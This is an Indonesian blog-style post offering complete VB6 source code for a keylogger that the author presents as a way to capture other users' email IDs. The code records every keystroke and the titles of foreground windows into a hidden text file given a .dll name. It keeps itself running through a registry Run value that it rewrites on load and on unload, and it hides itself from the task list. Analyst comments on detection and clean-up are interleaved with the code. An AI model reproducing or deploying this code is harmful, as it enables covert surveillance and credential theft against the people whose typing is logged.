Keylogger

Mungkin kita semua sudah sering mendengar tentang KeyLogger. Yeah.. KeyLogger adalah software yg mencatat gerak-gerik, atau aktivitas tombol yg kita tekan pada keyboard di sebuah komputer. KeyLogger kemudian mencatat semua informasi itu pada sebuah catatan (log). Hmm.. dengan keylogger ini kita bisa mengetahui aktivitas user. Misalnya aja user habis buka E-mail, kamu bakalan tau ID-nya si User :D

Okay... berikut ini source code KeyLogger yang bisa kamu compile pake VB6. Kita hanya butuh sebuah timer dan module. 

Yang perlu diperhatikan : 

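1. Setelah REGSVC32.exe dieksekusi, keylogger tsb akan lg menulis di registry agar program tsb dieksekusi pd waktu booting. Nilai di kunci Run berikut (nama nilai = nama file exe, isinya path lengkap ke exe) adalah artefak utama yang bisa diperiksa untuk mendeteksinya: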

(hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run). 

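2. Aktivitas keylogger ini tidak dapat dilihat melalui task manager (Ctrl+Alt+Del). Catatan: ini hanya berlaku di Windows 95/98/Me, karena penyembunyiannya memakai RegisterServiceProcess yang hanya ada di kernel32 versi tersebut. Di Windows berbasis NT (2000/XP ke atas) pemanggilan itu gagal dan errornya ditelan oleh On Error Resume Next, sehingga prosesnya tetap terlihat di daftar proses.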

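3. Kamu tidak dapat menghapus file REGSVC32.exe (this file is being used by windows) selama prosesnya masih berjalan; setelah prosesnya dihentikan, file itu bisa dihapus seperti biasa.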

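4. Kamu tidak dapat menghentikan booting REGSVC32.exe melalui regedit ato msconfig selama programnya masih berjalan, karena kode di bawah menulis ulang nilai Run saat form dimuat dan saat form ditutup (ENTERREGISTRY dipanggil di Form_Load dan Form_Unload). Untuk pembersihan, hentikan dulu prosesnya, baru hapus nilai Run dan file-nya.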

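5. Untuk melihat hasil rekaman KeyLogger ini kamu bisa buka file REGSVC32.DLL dengan Notepad. File ini sebenarnya teks biasa, bukan DLL: letaknya di folder yang sama dengan exe, diberi atribut hidden, dan namanya mengikuti baris pertama settings.ini (default "regsvc32").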

6. selama Keylogger ini aktif kamu tidak bisa melakukan Logoff user ... :( 

  

  

======= code mulai ========================== 

  

'simpan file hasil compile dg nama regsvc32.exe 

'form 

'simpan dg nama FRMLOG.frm 

  

' Form module (FRMLOG) declarations.
' Analyst summary of the Win32 APIs declared below and where the listing uses them:
'   GetAsyncKeyState (user32)        - polled for every key code in tmrLOG_Timer.
'   RegCreateKeyA / RegSetValueExA   - used by ENTERREGISTRY to write a Run value under HKLM.
'   RegisterServiceProcess (kernel32)- called from Form_Load and tmrCAPTION_Timer. This export
'                                      exists only in Windows 95/98/Me; on NT-based Windows the
'                                      call fails and the error is suppressed by the callers.
'   GetCurrentProcessId (kernel32)   - supplies the process id passed to RegisterServiceProcess.
'   Sleep (kernel32)                 - declared but not called anywhere in the code shown.
Option Explicit 

Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) 

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer 

Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long 

Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long  

Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long 

Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long 

  

' Base name used for the form caption, App.Title and the log file; set by LoadTextFile.
Private sAppName As String 

  

  

' Registry value type for a string (passed to RegSetValueEx in ENTERREGISTRY).
Private Const REG_SZ = 1 

' Predefined handle value for HKEY_LOCAL_MACHINE.
Private Const LOCALMACHINE = &H80000002 

' Flags for RegisterServiceProcess; only RSP_SIMPLE_SERVICE is used in the code shown.
Private Const RSP_SIMPLE_SERVICE = 1 

Private Const RSP_UNREGISTER_SERVICE = 0 

  

' Virtual-key codes. tmrLOG_Timer compares each polled key code against these
' and substitutes a readable label (e.g. " {ENTER} ") in the captured text.
' The bracketed labels are therefore recognisable content markers in a recovered log file.
Private Const VK_BACK = &H8 

Private Const VK_CONTROL = &H11 

Private Const VK_SHIFT = &H10 

Private Const VK_TAB = &H9 

Private Const VK_RETURN = &HD 

Private Const VK_MENU = &H12 

Private Const VK_ESCAPE = &H1B 

Private Const VK_CAPITAL = &H14 

Private Const VK_SPACE = &H20 

Private Const VK_SNAPSHOT = &H2C 

Private Const VK_UP = &H26 

Private Const VK_DOWN = &H28 

Private Const VK_LEFT = &H25 

Private Const VK_RIGHT = &H27 

' Mouse buttons are also reported by GetAsyncKeyState and are logged like keys.
Private Const VK_MBUTTON = &H4 

Private Const VK_RBUTTON = &H2 

Private Const VK_LBUTTON = &H1 

Private Const VK_PERIOD = &HBE 

Private Const VK_COMMA = &HBC 

  

' Numeric keypad codes; tmrLOG_Timer logs these as the plain digits "0".."9".
Private Const VK_NUMLOCK = &H90 

Private Const VK_NUMPAD0 = &H60 

Private Const VK_NUMPAD1 = &H61 

Private Const VK_NUMPAD2 = &H62 

Private Const VK_NUMPAD3 = &H63 

Private Const VK_NUMPAD4 = &H64 

Private Const VK_NUMPAD5 = &H65 

Private Const VK_NUMPAD6 = &H66 

Private Const VK_NUMPAD7 = &H67 

Private Const VK_NUMPAD8 = &H68 

Private Const VK_NUMPAD9 = &H69 

  

' Function keys F1..F12.
Private Const VK_F9 = &H78 

Private Const VK_F8 = &H77 

Private Const VK_F7 = &H76 

Private Const VK_F6 = &H75 

Private Const VK_F5 = &H74 

Private Const VK_F4 = &H73 

Private Const VK_F3 = &H72 

Private Const VK_F2 = &H71 

Private Const VK_F12 = &H7B 

Private Const VK_F11 = &H7A 

Private Const VK_F10 = &H79 

Private Const VK_F1 = &H70 

' Reads the first line of settings.ini (in the executable's folder) into sAppName.
' Falls back to "regsvc32" when the file cannot be read or the line is empty.
' Analyst note: sAppName later becomes the window caption and the base name of the
' log file written by SAVEDLL, so the log name is not fixed - a settings.ini next to
' the executable changes it. Hunt on the behaviour, not only on the default name.
Private Sub LoadTextFile() 

' Any I/O error (missing file, empty file) jumps to the default-name fallback.
On Error GoTo dlgerror 

' An App.Path of three characters or fewer is treated as a drive root, where the
' path is used without adding a "\" separator.
If Len(App.Path) <= 3 Then 

Open App.Path & "settings.ini" For Input As #1 

Line Input #1, sAppName 

Close 

Else 

Open App.Path & "\settings.ini" For Input As #1 

Line Input #1, sAppName 

Close 

End If 

  

If sAppName = vbNullString Then 

sAppName = "regsvc32" 

End If 

  

Exit Sub 

dlgerror: 

sAppName = "regsvc32" 

  

End Sub 

  

  

' Appends the buffered capture to "<App.Path>\<sAppName>.dll" and marks the file hidden.
' Analyst notes (all visible in the code below):
'   - The output has a .dll extension but is plain text, opened For Append, so it grows over time.
'   - Each record starts with the time and date, a "Size: ... MB" line and the literal
'     header "*** PROGRAMS OPENED ***", followed by the foreground-window list
'     (txtENUMERATE) and the captured keys (txtLOGGED). That header string is a usable
'     content signature when searching disks for leftover logs.
'   - The file sits in the same folder as the executable and gets the hidden attribute.
'   - All errors are discarded, so a failed write leaves no visible trace.
Private Sub SAVEDLL() 

Dim nSaveLocation As String 

On Error GoTo dlgerror 

  

' Same drive-root handling as LoadTextFile: no "\" is added for a short App.Path.
If Len(App.Path) <= 3 Then 

Open App.Path & sAppName & ".dll" For Append As #1 

nSaveLocation = App.Path & sAppName & ".dll" 

GoTo READY 

Else 

Open App.Path & "\" & sAppName & ".dll" For Append As #1 

nSaveLocation = App.Path & "\" & sAppName & ".dll" 

GoTo READY 

End If 

  

READY: 

   

  ' Nothing captured since the last flush: leave without writing a record.
  If txtLOGGED.Text = vbNullString Then 

  Exit Sub 

  End If 

   

  ' One record: timestamp, current file size in MB, window list, then captured text.
  Print #1, Time & " " & Date & vbCrLf & "Size: " & Format(FileLen(nSaveLocation) / 1000000, ".0") & " MB" & vbCrLf & "*** PROGRAMS OPENED ***" & vbCrLf & vbCrLf & txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf 

  Close 

  Close 

  Close 

  ' Hidden attribute: the file is not listed in a default Explorer view.
  SetAttr nSaveLocation, vbHidden 

  Exit Sub 

dlgerror: 

' Errors are cleared and ignored.
Err.Clear 

Exit Sub 

End Sub 

' Startup handler: loads the configured name, hides the form, writes the Run value
' and calls RegisterServiceProcess.
' Analyst notes:
'   - Me.Visible = False and App.TaskVisible = False keep the program out of the
'     visible window/task list; they do not remove the process itself.
'   - RegisterServiceProcess is only exported on Windows 95/98/Me. On NT-based
'     Windows the call fails, and On Error Resume Next hides that failure.
'   - ENTERREGISTRY runs on every start, so the Run value is re-created each time
'     the program is launched.
Private Sub Form_Load() 

' Every failure in this handler is silently skipped.
On Error Resume Next 

Call LoadTextFile 

Me.Caption = sAppName 

Me.Visible = False 

App.TaskVisible = False 

App.Title = sAppName 

ENTERREGISTRY 

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE 

End Sub 

' Writes an autostart entry: a REG_SZ value under
' HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run whose name is the
' executable's base name (App.EXEName) and whose data is the full path to the .exe.
' Analyst notes:
'   - This Run value is the persistence artefact to look for and to remove during
'     clean-up; the value data also reveals where the executable is stored.
'   - Return codes from both registry calls are ignored, so a denied write is silent.
'     NOTE(review): writing under HKLM normally needs administrative rights on
'     NT-based Windows, so running as a standard user should block this - confirm
'     on the target OS.
'   - Called from Form_Load and Form_Unload in the code shown.
Private Sub ENTERREGISTRY() 

Dim nKey As Long 

RegCreateKey LOCALMACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", nKey 

' Drive-root case: App.Path is used without adding a "\" separator.
If Len(App.Path) <= 3 Then 

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & ".exe", Len(App.Path & App.EXEName & ".exe") 

Else 

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & "\" & App.EXEName & ".exe", Len(App.Path & "\" & App.EXEName & ".exe") 

End If 

End Sub 

' Unload handler: sets Cancel, flushes the capture buffer to disk, rewrites the Run
' value, then unloads the form and ends the program.
' Analyst note: because ENTERREGISTRY is called here, a Run value deleted while the
' program is still running is written back when the form unloads. Clean-up should
' stop the process first and only then remove the Run value and the files.
' NOTE(review): the combined effect of Cancel = True followed by Unload Me and End
' is not evident from the listing alone - verify in a sandbox before relying on it.
Private Sub Form_Unload(Cancel As Integer) 

Cancel = True 

Call SAVEDLL 

ENTERREGISTRY 

Unload Me 

End 

End Sub 

' Timer handler that re-applies the caption and visibility settings and repeats the
' RegisterServiceProcess call on every tick (the timer interval is set on the form
' and is not shown in this listing).
' Analyst note: as in Form_Load, RegisterServiceProcess only exists on Windows
' 95/98/Me; elsewhere the call fails and On Error Resume Next hides the failure.
Private Sub tmrCAPTION_Timer() 

On Error Resume Next 

Me.Caption = sAppName 

Me.Visible = False 

App.TaskVisible = False 

App.Title = False 

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE 

End Sub 

  

' Timer handler that performs the capture: on each tick it asks GetAsyncKeyState
' about every key code from 1 to 255, turns each reported press into text and
' appends it to the txtLOGGED buffer, then records the foreground window.
' Analyst notes:
'   - Capture is by polling, not by installing a keyboard hook, so detection has to
'     key on the behaviour (a process repeatedly sweeping GetAsyncKeyState across
'     the whole key range) rather than on hook registration.
'   - Special keys and mouse buttons are written as bracketed labels such as
'     " {ENTER} " or " {L.B} "; these labels identify logs produced by this code.
'   - Captured text is held in a form control until tmrSAVE_Timer or Form_Unload
'     flushes it to disk via SAVEDLL.
Private Sub tmrLOG_Timer() 

On Error Resume Next 

Dim nKey, nChar As Integer 

Dim nText As String 

For nChar = 1 To 255 

nKey = GetAsyncKeyState(nChar) 

' -32767 is &H8001 as a signed 16-bit value: key currently down (high bit) and
' pressed since the previous GetAsyncKeyState call (low bit).
If nKey = -32767 Then 

' Default: the character with the same code as the virtual key.
nText = Chr(nChar) 

  

  ' Replace non-printing keys, mouse buttons and keypad digits with labels/digits.
  If nChar = VK_BACK Then 

  nText = " {B.S} " 

  ElseIf nChar = VK_CONTROL Then 

  nText = " {CTRL} " 

  ElseIf nChar = VK_SHIFT Then 

  nText = " {SHIFT} " 

  ElseIf nChar = VK_TAB Then 

  nText = " {TAB} " 

  ElseIf nChar = VK_RETURN Then 

  nText = " {ENTER} " 

  ElseIf nChar = VK_MENU Then 

  nText = " {ALT} " 

  ElseIf nChar = VK_ESCAPE Then 

  nText = " {ESC} " 

  ElseIf nChar = VK_CAPITAL Then 

  nText = " {CAPS} " 

  ElseIf nChar = VK_SPACE Then 

  nText = " {SP.B} " 

  ElseIf nChar = VK_UP Then 

  nText = " {UP} " 

  ElseIf nChar = VK_LEFT Then 

  nText = " {LEFT} " 

  ElseIf nChar = VK_RIGHT Then 

  nText = " {RIGHT} " 

  ElseIf nChar = VK_DOWN Then 

  nText = " {DOWN} " 

  ElseIf nChar = VK_F1 Then 

  nText = " {F1} " 

  ElseIf nChar = VK_F2 Then 

  nText = " {F2} " 

  ElseIf nChar = VK_F3 Then 

  nText = " {F3} " 

  ElseIf nChar = VK_F4 Then 

  nText = " {F4} " 

  ElseIf nChar = VK_F5 Then 

  nText = " {F5} " 

  ElseIf nChar = VK_F6 Then 

  nText = " {F6} " 

  ElseIf nChar = VK_F7 Then 

  nText = " {F7} " 

  ElseIf nChar = VK_F8 Then 

  nText = " {F8} " 

  ElseIf nChar = VK_F9 Then 

  nText = "{F9}" 

  ElseIf nChar = VK_F10 Then 

  nText = " {F10} " 

  ElseIf nChar = VK_F11 Then 

  nText = " {F11} " 

  ElseIf nChar = VK_F12 Then 

  nText = " {F12} " 

  ElseIf nChar = VK_SNAPSHOT Then 

  nText = " {PRINT SCRN} " 

  ElseIf nChar = VK_RBUTTON Then 

  nText = " {R.B} " 

  ElseIf nChar = VK_LBUTTON Then 

  nText = " {L.B} " 

  ElseIf nChar = VK_MBUTTON Then 

  nText = " {M.B} " 

  ElseIf nChar = VK_PERIOD Then 

  nText = "." 

  ElseIf nChar = VK_COMMA Then 

  nText = "," 

  ElseIf nChar = VK_NUMLOCK Then 

  nText = " {NUMLCK} " 

  ElseIf nChar = VK_NUMPAD0 Then 

  nText = "0" 

  ElseIf nChar = VK_NUMPAD1 Then 

  nText = "1" 

  ElseIf nChar = VK_NUMPAD2 Then 

  nText = "2" 

  ElseIf nChar = VK_NUMPAD3 Then 

  nText = "3" 

  ElseIf nChar = VK_NUMPAD4 Then 

  nText = "4" 

  ElseIf nChar = VK_NUMPAD5 Then 

  nText = "5" 

  ElseIf nChar = VK_NUMPAD6 Then 

  nText = "6" 

  ElseIf nChar = VK_NUMPAD7 Then 

  nText = "7" 

  ElseIf nChar = VK_NUMPAD8 Then 

  nText = "8" 

  ElseIf nChar = VK_NUMPAD9 Then 

  nText = "9" 

  End If 

' Accumulate in the in-memory buffer; nothing is written to disk here.
txtLOGGED.Text = txtLOGGED.Text + nText 

End If 

Next 

' Record which window is in the foreground (see mdlActiveWindow.bas).
Call GetActiveWindowName 

End Sub 

' Timer handler that flushes the capture to disk through SAVEDLL and then empties
' both in-memory buffers (captured keys and foreground-window list).
' Analyst note: the log file is appended to on this timer's schedule, so repeated
' writes to the same hidden ".dll" text file are an observable file-system pattern.
' The timer interval is set on the form and is not shown in this listing.
Private Sub tmrSAVE_Timer() 

Call SAVEDLL 

txtLOGGED.Text = vbNullString 

txtENUMERATE.Text = vbNullString 

End Sub 

  

====code end =========== 

  

  

============code mulai ============ 

  

'module visual basic 

'simpan dg nama mdlActiveWindow.bas 

  

' Module mdlActiveWindow: declarations used to record the foreground window.
' GetForegroundWindow, GetWindowTextA and GetClassNameA (user32) are called from
' GetActiveWindowName to obtain the handle, title and class name of the window the
' user is working in.
Option Explicit 

  

Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long 

Public Declare Function GetForegroundWindow Lib "user32" () As Long 

Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long 

' Buffer that receives the foreground window's title.
Public nCAPTION As String 

' Handle of the foreground window recorded on the previous change.
Public nTESTER As Long 

' Buffer that receives the foreground window's class name.
Public nClass As String 

  

' Records the foreground window whenever it changes: appends the current time, the
' window title and the window class name to FRMLOG.txtENUMERATE.
' Analyst note: this is what gives the captured keystrokes their context. The saved
' log lists window titles (for example a mail or banking page title) next to the
' text typed, so a recovered log exposes which applications were affected and helps
' scope which credentials need to be rotated.
Public Sub GetActiveWindowName() 

' Fixed 256-character buffers for the title and class name.
nCAPTION = Space(256) 

nClass = Space(256) 

  

GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION) 

GetClassName GetForegroundWindow, nClass, Len(nClass) 

  

' Same window handle as last time: nothing new to record.
If nTESTER = GetForegroundWindow Then Exit Sub 

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & " " & nCAPTION 

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass 

' Remember the handle so the next tick can detect a change.
nTESTER = GetForegroundWindow 

End Sub 

============ code end ==========

  

/* ------------------------------|EOF|------------------------------ */




